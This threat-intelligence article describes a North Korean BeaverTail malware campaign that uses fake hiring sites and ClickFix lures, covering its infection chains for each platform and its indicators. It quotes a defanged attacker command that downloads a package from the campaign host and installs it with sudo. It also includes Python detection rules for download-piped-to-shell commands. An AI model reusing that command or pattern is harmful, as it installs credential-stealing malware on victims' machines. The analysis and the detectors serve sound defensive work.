BeaverTail Variant via Malicious Repositories Targeting Retail Sector Organizations

A sophisticated North Korean nation-state threat actor campaign has emerged, distributing an evolved variant of the BeaverTail malware through deceptive fake hiring platforms and ClickFix social engineering tactics.

This latest campaign, active since May 2025, represents a significant tactical shift as threat actors expand beyond their traditional software developer targets to pursue marketing professionals, cryptocurrency traders, and retail sector personnel.

The malware distribution infrastructure centers around a fraudulent hiring website hosted at businesshire[.]top, masquerading as a legitimate recruitment platform.

The site offers positions including cryptocurrency trader roles at four web3 organizations and sales or marketing roles at three web3 companies and a US-based e-commerce retailer.

When job seekers attempt to record mandatory video responses during the fake application process, they encounter fabricated technical errors requiring them to execute malicious system commands as troubleshooting steps.

GitLab analysts identified this campaign through infrastructure analysis; the threat actor’s backend service, hosted at nvidiasdk.fly[.]dev, remained active as of publication.

The campaign demonstrates notable operational refinements, including the compilation of BeaverTail into standalone executables rather than relying on a JavaScript interpreter, which lets the malware run on machines of non-technical users that lack the usual development tooling.

The threat actors have implemented sophisticated evasion mechanisms throughout their infrastructure.

The malicious service gates its payloads on the User-Agent header, responding with legitimate decoy payloads when a request does not carry one of the expected short numeric values.

For example, requests without proper headers receive archives containing benign VisualBasic scripts and legitimate, signed Nvidia Broadcast executables, while authentic infection attempts using headers like “203” trigger the deployment of actual BeaverTail payloads.
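The header gating described above is also a cheap network signal for defenders: a User-Agent value that is nothing but a short number is almost never legitimate. As an added example (not code from the GitLab report), this Python snippet scans constructed proxy log lines and flags numeric-only User-Agents as well as any request to the reported backend host; the log format and client addresses are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample proxy log lines (not from the original report), in an
# assumed "client host method path status user_agent" format.
SAMPLE_PROXY_LOG = """\
10.0.0.5 nvidiasdk.fly.dev GET /nvs 200 "203"
10.0.0.5 nvidiasdk.fly.dev GET /nvs 200 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"
10.0.0.7 example.com GET /index.html 200 "curl/8.4.0"
10.0.0.9 nvidiasdk.fly.dev GET /nvs 200 "204"
10.0.0.9 cdn.example.net GET /lib.js 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


@dataclass
class Hit:
    client: str
    host: str
    user_agent: str
    reason: str


def scan_proxy_log(text: str, watch_hosts=frozenset({"nvidiasdk.fly.dev"})) -> list[Hit]:
    """Return one Hit per suspicious request: numeric-only User-Agent first,
    otherwise any request to a host on the campaign watch list."""
    hits: list[Hit] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than crash the scan
        client, host, _method, _path, _status, ua = m.groups()
        if ua.isdigit():
            hits.append(Hit(client, host, ua, "numeric-only User-Agent"))
        elif host in watch_hosts:
            hits.append(Hit(client, host, ua, "request to known campaign host"))
    return hits


def clients_with_numeric_ua(hits: list[Hit]) -> set[str]:
    """Clients that sent the gated request, i.e. likely ran the ClickFix command."""
    return {h.client for h in hits if h.reason == "numeric-only User-Agent"}
```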

Technical Infection Chain Analysis

The BeaverTail infection mechanism varies significantly across operating systems, demonstrating the threat actor’s technical sophistication and commitment to cross-platform targeting.

Infection chains (Source – GitLab)

On macOS systems, the ClickFix command initiates by downloading a seemingly legitimate installer package named com.nvidiahpc.pkg, which contains no payload data but executes a malicious preinstall script.

This script attempts to exfiltrate stored passwords from the non-standard ~/.myvars file location before downloading additional components from a GitHub repository hosted at /RominaMabelRamirez/dify.

The infection chain proceeds through the execution of downx64.sh, which retrieves two unsigned Mach-O binaries: x64nvidia containing the stripped-down BeaverTail variant, and payuniversal2, a PyInstaller-compiled version of InvisibleFerret.

The malware includes a fallback: it executes the InvisibleFerret binary only when Python 3 is not found at common installation paths, or when BeaverTail fails to create the expected ~/.npc entry-point file within ten seconds.

curl -k -A 204 -o /var/tmp/nvidia[.]pkg https[:]//nvidiasdk[.]fly[.]dev/nvs && 'sudo' installer -pkg /var/tmp/nvidia[.]pkg -target /

Windows infections follow a different trajectory, with the ClickFix command downloading nvidia.tar.gz containing multiple components including a renamed 7zip executable and a VisualBasic launcher script.

The update.vbs script performs dual functions: extracting password-protected Python dependencies to a hidden .pyp directory using the hardcoded password “ppp,” and launching the primary nvidiasdk[.]exe executable containing the compiled BeaverTail variant.

Linux systems receive the most streamlined infection vector: the malicious script is fetched with wget and piped directly into bash.

The script installs Node.js via the nvm-sh installer before downloading and executing a JavaScript version of BeaverTail functionally identical to the compiled versions deployed on other platforms.
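The three ClickFix chains above share command-line traits that an EDR or shell-audit pipeline can match without knowing the exact domains: a curl or wget download with a short numeric User-Agent, a package installed from /var/tmp, and a download piped straight into a shell. As an added example (not code from the report), this Python detector runs those rules over constructed process events and correlates the macOS download-then-install pair per host; hostnames, download hosts and the event tuple shape are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed EDR-style process events (hostname, command line); not from the
# original report. Download hosts are placeholders in the .example domain.
SAMPLE_EVENTS = [
    ("mac-01", "curl -k -A 204 -o /var/tmp/nvidia.pkg https://downloader.example/nvs"),
    ("mac-01", "sudo installer -pkg /var/tmp/nvidia.pkg -target /"),
    ("mac-02", "curl -A 'Mozilla/5.0' -o /tmp/release.tgz https://downloads.example/release.tgz"),
    ("lnx-01", "sh -c 'wget -qO- https://downloader.example/setup.sh | bash'"),
    ("lnx-02", "wget https://mirror.example/tool.tar.gz -O /opt/tool.tar.gz"),
    ("mac-03", "sudo installer -pkg /Users/alice/Downloads/Slack.pkg -target /"),
]

# Each rule is (name, compiled regex over the full command line).
RULES = [
    # curl/wget with a User-Agent that is only a short number (the gating value)
    ("numeric-user-agent-download",
     re.compile(r"\b(curl|wget)\b.*\s(-A|--user-agent)\s+['\"]?\d{1,4}['\"]?(\s|$)")),
    # macOS installer run against a package dropped in /var/tmp
    ("installer-from-var-tmp", re.compile(r"\binstaller\b.*-pkg\s+/var/tmp/")),
    # download piped directly into a shell, as in the Linux chain
    ("download-piped-to-shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
]


@dataclass
class Alert:
    host: str
    rule: str
    command_line: str


def scan_events(events) -> list[Alert]:
    """Apply every rule to every event; one Alert per (event, rule) match."""
    return [Alert(host, name, cmd)
            for host, cmd in events
            for name, rx in RULES if rx.search(cmd)]


def hosts_with_macos_chain(alerts: list[Alert]) -> set[str]:
    """Hosts where both the gated download and the /var/tmp installer fired,
    i.e. the full macOS ClickFix sequence rather than a lone odd download."""
    by_host: dict[str, set[str]] = {}
    for a in alerts:
        by_host.setdefault(a.host, set()).add(a.rule)
    needed = {"numeric-user-agent-download", "installer-from-var-tmp"}
    return {h for h, rules in by_host.items() if needed <= rules}
```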

This variant demonstrates reduced complexity compared to previous BeaverTail iterations, targeting only eight browser extensions rather than the typical 22, and omitting dedicated data extraction functions for browsers beyond Chrome.

The simplified codebase reduces overall malware size by approximately one-third while maintaining core credential stealing and cryptocurrency wallet targeting capabilities.

Command and control communications utilize the IP address 172.86.93[.]139 with “tttttt” serving as the campaign identifier across all infected systems.




About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.